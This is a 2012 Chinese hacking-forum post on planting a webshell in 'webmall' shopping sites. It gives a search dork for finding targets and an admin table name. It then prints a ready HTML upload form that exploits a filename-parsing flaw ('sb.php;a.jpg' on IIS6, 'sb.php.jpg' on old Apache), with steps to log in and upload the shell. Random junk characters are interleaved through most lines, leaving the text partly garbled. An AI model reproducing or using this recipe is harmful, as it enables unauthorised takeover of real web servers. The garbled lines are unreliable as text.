关键字:inurl:webmall/detail.php?id
, J9 N6 |" m) _. _9 D
' m/ [& y. B V0 U) E0 j数据表:pwn_base_admin3 g7 R* d7 p: t/ C& I3 s. h# Y
1 I9 w8 R: u. V& u7 ^, N! x7 h3 Y关于拿shell
, k8 [9 }7 s; D' E7 n7 ]
7 t: i) M' _) K$ r; N2 S% [1 |首先登录后台admin.php
5 U* ^: q: n- ~$ J# F# T2 w2 s & p( N" v5 W" p$ L
看了upload.php源码,分析了一个下午,然后大约是明白了虽然上传那里只允许上传gif,jpg,png,bmp四种文件,但是并没有对文件名做限制。
( T; w2 A5 T" ]7 F3 x8 x& m换句话说,sb.php;a.jpg这样的文件也是允许的,只要服务器是IIS6就拿到webshel,低版本的apache可以试着重命名为sb.php.jpg+ |% a% C7 s8 f R: s" ?- D
然后搞完了才发现,这里的比我的更精简,我那个蛋疼,膜拜下三石,然后就借用了,我的开始和他的一样是采取全部源码的,然后发现了更精简的- d a& _; s% K1 L
<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://xxx.com/kedit/upload_cgi/upload.php"> $ m0 }+ x8 h$ n
<input type="text" name="fileName" value="sb.php;a.jpg" />
9 l8 C. C8 P& L0 s* ?<input type="hidden" name="attachPath" value="news/pics/" />
1 o9 C3 u. S& Q9 k% P<input type="file" name="fileData" size="14" /></td>
+ c! u1 [& c4 G" ^! J: D1 Q<input type="submit" name="button" value="确定" />
& y# ^( F. p4 o7 ]% |6 H8 m/ I. o0 {. W& W</form>( ?- j0 R) o& j" @0 I: u; b5 f! L
6 @8 [. C) I; r! Y9 c% Q首先登录后台,然后把上面的文件保存为xx.html,修改action,然后再上传,如果为iis6就在上传了查看源码就好了。. t+ J3 W8 J% c& W$ I' S4 K2 z
. f0 X+ Q8 R* L; ?
|
发表于 2012-11-9 20:52:15
收藏
支持
反对